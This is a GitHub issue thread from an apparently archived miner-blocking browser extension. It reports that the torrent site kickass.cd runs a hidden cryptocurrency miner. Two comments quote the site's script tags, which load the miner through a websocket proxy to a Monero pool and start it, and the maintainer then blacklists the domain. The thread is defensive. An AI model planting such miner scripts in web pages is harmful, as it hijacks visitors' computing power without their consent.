Skip to content
This repository has been archived by the owner on Sep 10, 2020. It is now read-only.

Kickass.cd miner does not stop working #119

Closed
NikoGrano opened this issue Jan 3, 2018 · 2 comments
Closed

Kickass.cd miner does not stop working #119

NikoGrano opened this issue Jan 3, 2018 · 2 comments
Assignees

Comments

@NikoGrano
Copy link

Site kickass.cd is using miner and it's not blocked.

It's using following line to run the miner. Tough js is encrypted or something, so I can't understand anything... It's basicly BASE64 encoded and you can decrypt it easily. After decrypting I noticed it's also obusficated. Here is decrypted version available: https://pastebin.com/nAhTiY7X

<script src="https://kickass.cd/m.js?proxy=wss://mine.torrent.pw?pool=us-backup.supportxmr.com:3333"></script>
--
  | <script>
  | var miner = CH.Anonymous('43diebQLSFGfQg5xobxSk4C42gnMUCVvU9WPxEXnBuqa9ANbThwWwaH1MELagmxQhRcXmhmaPAV1rEp9SacwzsdKNRPjxDt+100');
  | miner.start();
  | </script>

Basicly, this miner can be stop using command stop. So when I run miner.stop();. It will stop. Very simple miner and I'm sure this can be blocked easily, but I do not know how to write fix nor have time to write it.

@keraf keraf self-assigned this Jan 7, 2018
@keraf keraf added the blacklist label Jan 7, 2018
keraf added a commit that referenced this issue Jan 7, 2018
@keraf keraf mentioned this issue Jan 7, 2018
@keraf keraf closed this as completed Jan 8, 2018
@TonyRL
Copy link

TonyRL commented Jan 11, 2018

if (jQuery(window).width() > 600 ) {
document.write("\n");
document.write("<script src='https://kickass.cd/power2/m.js?proxy=wss://mine.torrent.pw'><\/script>"); 
document.write("\n"); 
document.write("<script>new CH.Anonymous('X',{throttle:1-0.70}).start(CH.FORCE_EXCLUSIVE_TAB);<\/script>");
}</script>

and again...

@Firminator
Copy link
Contributor

Firminator commented May 31, 2018

#163

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Projects
None yet
Development

No branches or pull requests

4 participants